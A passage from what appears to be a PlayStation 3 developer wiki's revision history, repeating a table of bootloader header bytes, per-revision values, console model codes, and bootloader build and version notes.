Version //--&gt; 1.6.0 / &lt;!--// Build ID //--&gt;2040,21378 / &lt;!--// Build Date //--&gt;2007-04-17_20:46:43<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E 8C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;31 B5 9A 07 2E D4 5C B5 68 08 C2 FC&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{GECR1100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 1C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;06 5B 86 0C 5C F7 6A C4 59 8D D7 B4&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 1.9.7 / &lt;!--// Build ID //--&gt;2588,26593 / &lt;!--// Build Date //--&gt;2007-10-01_16:19:11 &lt;br&gt; first [[NOR]] {{CEX}} consoles (minver 2.30)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;89 EF FD 15 B3 85 0E 3B 2A 73 44 84&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E ED 04 A0 4E 41 53 2A C1 23 C7 18&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Boot Loader SE Version 2.1.0 ...(Build ID: 2709,28222, .........Build Data: 2007-12-05_13:32:28)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;E6 44 A0 75 B6 0B 79 96 C1 29 7A A0&lt;/code&gt;&amp;nbsp; || {{CECHJ}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C 79 D6 5D 60 28 76 FF AD A6 FD&lt;/code&gt;&amp;nbsp; || {{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 2.2.0 / &lt;!--// Build ID //--&gt;2883,30440 / &lt;!--// Build Date //--&gt;2008-03-18_17:28:18<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;7B 09 CB EE 00 2F AF 51 59 F8 D5 A8&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || &lt;!--// Boot Loader SE Version //--&gt; 2.3.5 / &lt;!--// Build ID //--&gt;3034,32025 / &lt;!--// Build Date //--&gt;2008-05-12_15:29:27<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;B1 94 34 A3 3C F1 C8 66 DF 42 0E 50&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}} || Boot Loader SE Version 2.4.5 ...(Build ID: 3163,33519, .........Build Data: 2008-07-14_20:31:16)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;83 EF B9 76 C4 DE D1 35 32 7C D3 77&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;61 D1 9B A5 41 68 16 3C 01 9F 88 4B&lt;/code&gt;&amp;nbsp; || {{DECHJ00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E B3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;92 AC 2C 21 57 A5 77 C8 4D DF EC DB&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;41 F7 93 C7 09 41 8F 93 89 44 BA 7A&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 2.7.0 ...(Build ID: 3517,38879, .........Build Date: 2009-03-24_23:51:55)&lt;br /&gt;Initial version for DECR-1400 dropped sc_dev_access support<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;FA 46 EC 86 57 0F CA AA 06 4E 8A 86&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 2.8.5 ...(Build ID: 3640,40665, .........Build Date: 2009-06-29_21:04:39)&lt;br /&gt;Same code as 2.7.0 with build strings changes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F5 A2 21 B5 C0 5F 21 42 01 97 9D AA&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 3.0.0 ...(Build ID: 3684,41778, .........Build Date: 2009-08-28_22:53:58)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 3B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;77 80 B1 34 B6 DF 25 8A 1A BB AB 4D&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF B3 45 5D 6A 9F D7 51 00 5E 34 BC&lt;/code&gt;&amp;nbsp; || {{CECH2100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 92 1C E7 F7 33 41 76 9B 7A 1E D6&lt;/code&gt;&amp;nbsp; || {{CECH2100}}&lt;br /&gt;{{CECH2500}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 3.3.0 ...(Build ID: 3881,45141, .........Build Date: 2010-04-13_22:09:13)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;CB 9E 15 24 28 B4 4F D2 F9 3F BC 43&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2500}} || Boot Loader SE Version 3.4.0 ...(Build ID: 3932,45679, .........Build Date: 2010-06-07_23:08:10)&lt;br /&gt;Same code as 3.3.0 Only the build version strings change.<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 53&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E6 A0 BB B0 AF A2 00 67 D0 B3 9A&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.0 / &lt;!--// Build ID //--&gt;4002,46268 / &lt;!--// Build Date //--&gt;2010-09-21_18:48:40&lt;br /&gt;Enforced 0003004FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 5B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;AA 3A EA 6E 3D A0 9A 58 1E 1E 21 00&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.6 / &lt;!--// Build ID //--&gt;4275,46986 / &lt;!--// Build Date //--&gt;2011-02-15_19:06:04&lt;br /&gt;Enforced 00030055FFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C5 A4 27 71 EE 5E 21 9A 3B FC 2C 45&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || Should be Enforced 0003005FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 EC A7 4A 8E 14 D4 73 12 91 28 E8&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;63 B9 D9 81 30 DB 7B B0 F3 9D 12 4F&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 03&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BB CC BF 29 EC D8 02 84 4E B2 8A E6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 0B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2E 60 41 04 D9 43 D1 B5 34 D4 C5 F5&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || minver 3.72<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1F DC 1E 2D F0 0D A3 67 01 E2 F8 F6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || <br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:bootldr&diff=41428 Talk:Flash:bootldr 2016-03-31T20:10:13Z <p>Mathieulh: /* Per revision key */ Added refurbished DECR-1000 bootloader info</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0xFC0000&lt;br /&gt;NAND:0x0&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0xFC0004&lt;br /&gt;NAND:0x4&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 28 BE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C0 2E 2F EA F6 1C A6 F1 CC C8 8B 5F&lt;/code&gt;&amp;nbsp; || {{CEB-2030}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2C FE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;80 5B F2 D9 AC D2 00 61 B6 99 BB 96&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;44 48 90 DD 19 2C 91 2D BB 99 6F C8&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 1257,12300, .........Build Data: 2006-07-06_02:22:23)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F2 C2 E4 E5 CC 02 FB 99 7C 50 90 82&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 3163,33535, .........Build Data: 2008-07-15_15:06:19)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 7F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;12 1D 73 39 4A F2 98 81 F8 D6 B1 8C&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 1A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 02 B3 13 C2 80 B8 35 AA 03 3F FE&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5C E4 63 CD 5C 9E B6 7A FE A0 1B 54&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1C 21 81 C8 EA 41 86 5C 8B 33 8A EF&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{DECHA}} || Boot Loader SE Version 1.0.0 ...(Build ID: 1673,16934, .........Build Data: 2006-10-30_12:39:57)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 44&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;3F F1 1F 14 C3 42 44 3C 88 B1 8E 90&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F9 96 D8 4E 1A 9D 50 BF 97 F4 A0 CE&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1798,18531, .........Build Data: 2007-01-10_12:09:26)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 30 D5 52 4B 74 99 65 CF 95 AE 5F&lt;/code&gt;&amp;nbsp; || {{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1943,19890, .........Build Data: 2007-02-22_15:52:05)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 3F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;04 AD 56 18 64 8D 49 94 23 8F B8 A1&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || &lt;!--// Boot Loader SE Version //--&gt; 1.6.0 / &lt;!--// Build ID //--&gt;2040,21378 / &lt;!--// Build Date //--&gt;2007-04-17_20:46:43<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E 8C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;31 B5 9A 07 2E D4 5C B5 68 08 C2 FC&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{GECR1100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 1C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;06 5B 86 0C 5C F7 6A C4 59 8D D7 B4&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 1.9.7 / &lt;!--// Build ID //--&gt;2588,26593 / &lt;!--// Build Date //--&gt;2007-10-01_16:19:11 &lt;br&gt; first [[NOR]] {{CEX}} consoles (minver 2.30)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;89 EF FD 15 B3 85 0E 3B 2A 73 44 84&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E ED 04 A0 4E 41 53 2A C1 23 C7 18&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Boot Loader SE Version 2.1.0 ...(Build ID: 2709,28222, .........Build Data: 2007-12-05_13:32:28)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;E6 44 A0 75 B6 0B 79 96 C1 29 7A A0&lt;/code&gt;&amp;nbsp; || {{CECHJ}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C 79 D6 5D 60 28 76 FF AD A6 FD&lt;/code&gt;&amp;nbsp; || {{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 2.2.0 / &lt;!--// Build ID //--&gt;2883,30440 / &lt;!--// Build Date //--&gt;2008-03-18_17:28:18<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;7B 09 CB EE 00 2F AF 51 59 F8 D5 A8&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || &lt;!--// Boot Loader SE Version //--&gt; 2.3.5 / &lt;!--// Build ID //--&gt;3034,32025 / &lt;!--// Build Date //--&gt;2008-05-12_15:29:27<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;B1 94 34 A3 3C F1 C8 66 DF 42 0E 50&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}} || Boot Loader SE Version 2.4.5 ...(Build ID: 3163,33519, .........Build Data: 2008-07-14_20:31:16)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;83 EF B9 76 C4 DE D1 35 32 7C D3 77&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;61 D1 9B A5 41 68 16 3C 01 9F 88 4B&lt;/code&gt;&amp;nbsp; || {{DECHJ00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E B3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;92 AC 2C 21 57 A5 77 C8 4D DF EC DB&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;41 F7 93 C7 09 41 8F 93 89 44 BA 7A&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 2.7.0 ...(Build ID: 3517,38879, .........Build Date: 2009-03-24_23:51:55)&lt;br /&gt;Initial version for DECR-1400 dropped sc_dev_access support<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;FA 46 EC 86 57 0F CA AA 06 4E 8A 86&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 2.8.5 ...(Build ID: 3640,40665, .........Build Date: 2009-06-29_21:04:39)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F5 A2 21 B5 C0 5F 21 42 01 97 9D AA&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 3.0.0 ...(Build ID: 3684,41778, .........Build Date: 2009-08-28_22:53:58)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 3B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;77 80 B1 34 B6 DF 25 8A 1A BB AB 4D&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF B3 45 5D 6A 9F D7 51 00 5E 34 BC&lt;/code&gt;&amp;nbsp; || {{CECH2100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 92 1C E7 F7 33 41 76 9B 7A 1E D6&lt;/code&gt;&amp;nbsp; || {{CECH2100}}&lt;br /&gt;{{CECH2500}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 3.3.0 ...(Build ID: 3881,45141, .........Build Date: 2010-04-13_22:09:13)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;CB 9E 15 24 28 B4 4F D2 F9 3F BC 43&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2500}} || Boot Loader SE Version 3.4.0 ...(Build ID: 3932,45679, .........Build Date: 2010-06-07_23:08:10)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 53&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E6 A0 BB B0 AF A2 00 67 D0 B3 9A&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.0 / &lt;!--// Build ID //--&gt;4002,46268 / &lt;!--// Build Date //--&gt;2010-09-21_18:48:40&lt;br /&gt;Enforced 0003004FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 5B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;AA 3A EA 6E 3D A0 9A 58 1E 1E 21 00&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.6 / &lt;!--// Build ID //--&gt;4275,46986 / &lt;!--// Build Date //--&gt;2011-02-15_19:06:04&lt;br /&gt;Enforced 00030055FFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C5 A4 27 71 EE 5E 21 9A 3B FC 2C 45&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || Should be Enforced 0003005FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 EC A7 4A 8E 14 D4 73 12 91 28 E8&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;63 B9 D9 81 30 DB 7B B0 F3 9D 12 4F&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 03&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BB CC BF 29 EC D8 02 84 4E B2 8A E6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 0B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2E 60 41 04 D9 43 D1 B5 34 D4 C5 F5&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || minver 3.72<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1F DC 1E 2D F0 0D A3 67 01 E2 F8 F6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || <br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:bootldr&diff=41427 Talk:Flash:bootldr 2016-03-31T18:14:15Z <p>Mathieulh: /* Per revision key */ Added the DECR-1000 bootloader info</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0xFC0000&lt;br /&gt;NAND:0x0&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0xFC0004&lt;br /&gt;NAND:0x4&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 28 BE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C0 2E 2F EA F6 1C A6 F1 CC C8 8B 5F&lt;/code&gt;&amp;nbsp; || {{CEB-2030}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2C FE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;80 5B F2 D9 AC D2 00 61 B6 99 BB 96&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F2 C2 E4 E5 CC 02 FB 99 7C 50 90 82&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;44 48 90 DD 19 2C 91 2D BB 99 6F C8&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 1257,12300, .........Build Data: 2006-07-06_02:22:23)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 7F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;12 1D 73 39 4A F2 98 81 F8 D6 B1 8C&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 1A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 02 B3 13 C2 80 B8 35 AA 03 3F FE&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5C E4 63 CD 5C 9E B6 7A FE A0 1B 54&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1C 21 81 C8 EA 41 86 5C 8B 33 8A EF&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{DECHA}} || Boot Loader SE Version 1.0.0 ...(Build ID: 1673,16934, .........Build Data: 2006-10-30_12:39:57)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 44&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;3F F1 1F 14 C3 42 44 3C 88 B1 8E 90&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F9 96 D8 4E 1A 9D 50 BF 97 F4 A0 CE&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1798,18531, .........Build Data: 2007-01-10_12:09:26)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 30 D5 52 4B 74 99 65 CF 95 AE 5F&lt;/code&gt;&amp;nbsp; || {{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1943,19890, .........Build Data: 2007-02-22_15:52:05)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 3F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;04 AD 56 18 64 8D 49 94 23 8F B8 A1&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || &lt;!--// Boot Loader SE Version //--&gt; 1.6.0 / &lt;!--// Build ID //--&gt;2040,21378 / &lt;!--// Build Date //--&gt;2007-04-17_20:46:43<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E 8C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;31 B5 9A 07 2E D4 5C B5 68 08 C2 FC&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{GECR1100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 1C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;06 5B 86 0C 5C F7 6A C4 59 8D D7 B4&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 1.9.7 / &lt;!--// Build ID //--&gt;2588,26593 / &lt;!--// Build Date //--&gt;2007-10-01_16:19:11 &lt;br&gt; first [[NOR]] {{CEX}} consoles (minver 2.30)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;89 EF FD 15 B3 85 0E 3B 2A 73 44 84&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E ED 04 A0 4E 41 53 2A C1 23 C7 